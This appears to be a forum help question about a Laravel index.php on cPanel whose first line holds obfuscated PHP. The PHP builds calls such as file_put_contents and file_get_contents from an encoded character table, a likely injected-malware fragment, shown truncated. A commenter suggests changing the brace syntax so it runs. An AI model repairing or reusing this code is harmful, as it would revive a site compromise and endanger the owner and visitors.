# Css and styles are not loading for my laravel project in Cpanel

Tags: php, cpanel, laravel-9

I have an index.php file which having below type code in line 2

```
> <?php
> $O00OO_0_O_=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F% 65%68%63%73%77%6F4%2B%6637%6A");$O000OOO___=$O00OO_0_O_{38}.$O00OO_0_O_{12}.$O00OO_0_O_{23}.$O00OO_0_O_{30}.$O00OO_0_O_{29}.$O00OO_0_O_{16}.$O00OO_0_O_{18}.$O00OO_0_O_{10}.$O00OO_0_O_{29}.$O00OO_0_O_{32}.$O00OO_0_O_{35}.$O00OO_0_O_{0}.$O00OO_0_O_{10}.$O00OO_0_O_{30}.$O00OO_0_O_{0}.$O00OO_0_O_{10}.$O00OO_0_O_{33};$O_0O_0O0O_=$O00OO_0_O_{38}.$O00OO_0_O_{12}.$O00OO_0_O_{23}.$O00OO_0_O_{30}.$O00OO_0_O_{29}.$O00OO_0_O_{27}.$O00OO_0_O_{30}.$O00OO_0_O_{10}.$O00OO_0_O_{29}.$O00OO_0_O_{32}.$O00OO_0_O_{35}.$O00OO_0_O_{0}.$O00OO_0_O_{10}.$O00OO_0_O_{30}.$O00OO_0_O_{0}.$O00OO_0_O_{10}.$O00OO_0_O_{33}............
> ?>
> <?php
> 
> use Illuminate\Contracts\Http\Kernel;
> use Illuminate\Http\Request;
> 
> define('LARAVEL_START', microtime(true));
> 
> /*
> |--------------------------------------------------------------------------
> Check If The Application Is Under Maintenance
> |--------------------------------------------------------------------------
> |
> If the application is in maintenance / demo mode via the "down" 
  command
> we will load this file so that any pre-rendered content can be 
  shown
> instead of starting the framework, which could cause an 
  exception.
> |
> */
> 
> if (file_exists(__DIR__.'/storage/framework/maintenance.php')) {
> require __DIR__.'/storage/framework/maintenance.php';
> }
> /*
> |--------------------------------------------------------------------------
> Register The Auto Loader
> |--------------------------------------------------------------------------
> |
> Composer provides a convenient, automatically generated class 
 loader for
> this application. We just need to utilize it! We'll simply 
   require it
> into the script here so we don't need to manually load our 
  classes.
> |
> */
> require __DIR__.'/vendor/autoload.php';
> /*
> |--------------------------------------------------------------------------
> Run The Application
> |--------------------------------------------------------------------------
> |
> Once we have the application, we can handle the incoming request 
  using
> the application's HTTP kernel. Then, we will send the response 
  back
> to this client's browser, allowing them to enjoy our application.
> |
> */
> $app = require_once __DIR__.'/bootstrap/app.php';
> $kernel = $app->make(Kernel::class);
> $response = tap($kernel->handle(
>     $request = Request::capture()
> ))->send();
> $kernel->terminate($request, $response);
```

By using above index.php my website shows
Fatal error: Array and string offset access syntax with curly braces is no longer supported in /home/qvnz1i3anmka/public_html/index.php on line 2

when i remove starting code under php tags , website is loading without any styles

Comment: I'm not sure about what the initial code does, but what if you use `[]` instead of `{}` for the indexes?